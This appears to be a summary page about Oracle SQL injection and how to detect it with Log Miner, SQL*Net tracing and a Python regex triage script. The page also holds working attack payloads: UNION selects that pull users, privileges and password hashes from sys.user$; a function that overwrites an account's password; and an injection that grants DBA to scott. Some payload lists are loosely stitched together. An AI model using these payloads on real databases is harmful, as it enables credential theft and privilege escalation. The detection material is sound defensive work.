Oracle injection summary

Original post, 24 October 2004 12:33:00
Reference: http://www.petefinnigan.com/papers/detect.sql
a'='a' or 1=1
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
::FRED

SQL> select log_mode from v$database;
SQL> select name,value from v$parameter
2 where name in('log_archive_start','log_archive_dest');
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
log_archive_start
TRUE
log_archive_dest
/export/home/u01/app/oracle/admin/emil/archive
SQL> select name,value from v$parameter
2 where name = 'transaction_auditing';
NAME
----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
transaction_auditing
TRUE
Now execute the SQL injection attempt and then use Log Miner to see what is recorded. To make the analysis easier for this example, the archive log is saved before and after to ensure only this command is in the log:

SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
SQL> connect dbsnmp/dbsnmp@emil
Connected.
SQL> set serveroutput on size 100000
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::EMIL
<records snipped>
::SYS
::SYSTEM
::WKSYS
::ZULIA
PL/SQL procedure successfully completed.
SQL> connect sys as sysdba
Enter password:
Connected.
SQL> alter system archive log current;
System altered.
SQL>
First create the Log Miner dictionary:

SQL> set serveroutput on size 1000000
SQL> exec dbms_logmnr_d.build('logmnr.dat','/tmp');
LogMnr Dictionary Procedure started
LogMnr Dictionary File Opened
TABLE: OBJ$ recorded in LogMnr Dictionary File
TABLE: TAB$ recorded in LogMnr Dictionary File
TABLE: COL$ recorded in LogMnr Dictionary File
TABLE: TS$ recorded in LogMnr Dictionary File
<output snipped>
Procedure executed successfully - LogMnr Dictionary Created
PL/SQL procedure successfully completed.
SQL> select name
2 from v$archived_log
3 where completion_time=(select max(completion_time) from v$archived_log);
NAME
--------------------------------------------------------------------------------
/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf
SQL>
Now load the archive log file into Log Miner:

SQL> exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW);
PL/SQL procedure successfully completed.
SQL> exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat');
PL/SQL procedure successfully completed.
SQL>
Finally, search the results:

SQL> select scn,username,timestamp,sql_redo
2 from v$logmnr_contents;
<snipped>
SCN USERNAME TIMESTAMP SQL_REDO
---------- --------------- --------- ------------------------------
253533 DBSNMP 16-JUN-03 set transaction read write;
253533 DBSNMP 16-JUN-03 update "SYS"."AUD$" set
"ACTION#" = '101',
"RETURNCODE" = '0',
"LOGOFF$LREAD" = '228',
"LOGOFF$PREAD" = '0',
"LOGOFF$LWRITE" = '10',
"LOGOFF$DEAD" = '0',
"LOGOFF$TIME" =
TO_DATE('16-JUN-2003
12:16:12', 'DD-MON-YYYY
HH24:MI:SS'), "SESSIONCPU" =
'5' where "ACTION#" = '100'
and "RETURNCODE" = '0' and
"LOGOFF$LREAD" IS NULL and
"LOGOFF$PREAD" IS NULL and
"LOGOFF$LWRITE" IS NULL and
"LOGOFF$DEAD" IS NULL and
"LOGOFF$TIME" IS NULL and
"SESSIONCPU" IS NULL and ROWID
= 'AAAABiAABAAAAEWAAX';
253534 DBSNMP 16-JUN-03 commit;
<snipped output>
SQL> select p.spid,s.username
2 from v$session s,v$process p
3 where s.paddr=p.addr;
SPID USERNAME
--------- ------------------------------
<records snipped>
616 DBSNMP
556 SYSTEM
9 rows selected.
SQL>
To enable trace simply add the following lines to the $ORACLE_HOME/network/admin/sqlnet.ora file:

TRACE_FILE_SERVER=pf_trace.trc
TRACE_DIRECTORY_SERVER=/tmp
TRACE_LEVEL_SERVER=SUPPORT
SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
PL/SQL procedure successfully completed.
exec get_cust2('x'' or ''x''=''x'' --');
exec get_cust('x'' union select sys.login_user from sys.dual where ''x''=''x');
exec get_cust('x'' union select to_char(sysdate) from sys.dual@plsq where ''x''=''x');
exec get_cust('x'' union select 1,''Y'' from sys.dual where ''x''=''x');
exec get_cust('x'' union select object_name,object_type,''x'' from user_objects where ''x''=''x');
exec get_cust('x'' union select granted_role,admin_option,default_role from user_role_privs where ''x''=''x');
exec get_cust('x'' union select privilege,admin_option,''X'' from user_sys_privs where ''x''=''x');
exec get_cust_bind('Clark');
exec get_cust_bind('x'' union select username from all_users where ''x''=''x');

select customer_phone from customers where customer_surname='x' select username from all_users where 'x'='x'

select customer_phone from customers where customer_surname='x' union select username from all_users where 'x'='x'
select customer_phone from customers where customer_surname='x' or exists (select 1 from sys.dual) and 'x'='x'
select customer_phone from customers where customer_surname='x' or 'x'='x'

select customer_phone from customers where customer_surname='x' or 'x'='x' --' and customer_type=1
select customer_phone from customers where customer_surname='x' union select sys.login_user from sys.dual where 'x'='x'
select customer_phone from customers where customer_surname='x' union select to_char(sysdate) from sys.dual@plsq where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select 1,'Y' from sys.dual where 'x'='x'

select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select object_name,object_type,'x' from user_objects where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select granted_role,admin_option,default_role from user_role_privs where 'x'='x'
select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select privilege,admin_option,'X' from user_sys_privs where 'x'='x'
select customer_phone from customers where customer_surname=:surname::999444888

select customer_phone from customers where customer_surname=:surname
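The Log Miner output above only shows the AUD$ update (redo records changes, not SELECTs), so the statement text has to come from the SQL*Net trace or the application's debug output; the triage below runs over statements captured that way. It is an added example, not code from Pete Finnigan's paper or this page: the sample statements are constructed to mirror the shapes listed above, and the indicator and dictionary-object lists are assumptions a site would tune to its own application.

```python
import re

# Constructed sample in the shape the debug/trace output above shows
# (not copied from a real trace file); the injected ones reuse the page's payload shapes.
SAMPLE_STATEMENTS = [
    "select customer_phone from customers where customer_surname='Clark'",
    "select customer_phone from customers where customer_surname=:surname",
    "select customer_phone from customers where customer_surname='x' union select username from all_users where 'x'='x'",
    "select customer_phone from customers where customer_surname='x' or 'x'='x' --' and customer_type=1",
    "select customer_phone from customers where customer_surname='x' or exists (select 1 from sys.dual) and 'x'='x'",
    "select customer_phone from customers where customer_surname='x' union select to_char(sysdate) from sys.dual@plsq where 'x'='x'",
]

# Dictionary objects the customers application never references itself (assumed list; tune per site).
SENSITIVE_OBJECTS = ("all_users", "sys.user$", "dba_users", "user_sys_privs",
                     "user_role_privs", "user_objects", "sys.dual")

INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    # or 'x'='x' / and 1=1: both sides of the comparison are the same literal
    ("tautology", re.compile(r"\b(or|and)\s+('[^']*'|\d+)\s*=\s*\2", re.I)),
    ("comment_terminator", re.compile(r"--")),
    # reaching through a database link, as in sys.dual@plsq above
    ("dblink", re.compile(r"\bfrom\s+\S+@\w+", re.I)),
]


def analyse(sql):
    """Return (indicator names, uses_binds) for one captured statement."""
    hits = [name for name, rx in INDICATORS if rx.search(sql)]
    low = sql.lower()
    hits += ["dictionary:" + obj for obj in SENSITIVE_OBJECTS if obj in low]
    # a parameterised predicate (customer_surname=:surname) is the expected, safe shape
    uses_binds = re.search(r"=\s*:\w+", sql) is not None
    return hits, uses_binds


def triage(statements):
    """Classify each statement: 'suspect' (any indicator), 'bind' (parameterised), else 'ok'."""
    out = []
    for sql in statements:
        hits, binds = analyse(sql)
        verdict = "suspect" if hits else ("bind" if binds else "ok")
        out.append((verdict, hits, sql))
    return out


if __name__ == "__main__":
    for verdict, hits, sql in triage(SAMPLE_STATEMENTS):
        print(f"{verdict:8} {','.join(hits) or '-':40} {sql[:60]}")
```

The trace line with a bind value appended (`=:surname::999444888`) still classifies as `bind`, so statements built with bind variables separate cleanly from the literal-concatenated ones.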

exec get_cust('x'' union select username from all_users where ''x''=''x')
exec dbms_logmnr.add_logfile('/export/home/u01/app/oracle/admin/emil/archive/1_7.dbf',sys.dbms_logmnr.NEW)
exec dbms_logmnr.start_logmnr(dictFileName => '/tmp/logmnr.dat')

exec sys.list_libraries('sys');
exec sys.list_libraries('foo''union select password from sys.user$--);
select sys.select_count('sys') from dual;
select sys.select_count('sys' union select password from sys.user$ where name=''sys''--') from dual;
select sys.select_count('sys''union select user# from sys.user$ where name=''sys''--') from dual;
select sys.select_count('sys''and object name=(select password from sys.user$ where name=''sys''--') from dual;
select sys.select_count('foo''||scott.get_it()--') from dual;
call exec dbms_output.put_line('output')
exec sys.new_emp('foo''||scott.get_it)--');
create or replace function rstpwd return
 varchar2 authid current_user is
mystmt varchar2(200);
begin
mystmt:='update sys.user$ set password=
 ''fe0e8ce7c92504e9'' where name=''anonymous''';
execute immediate mystmt;
return 'foo';
end;
/
exec sys.new_emp('p''||scott.rstpwd)--');

exec sys.anon_block('foobar');
exec sys.anon_block('f'');execute immediate ''grant dba to scott''; end;--');
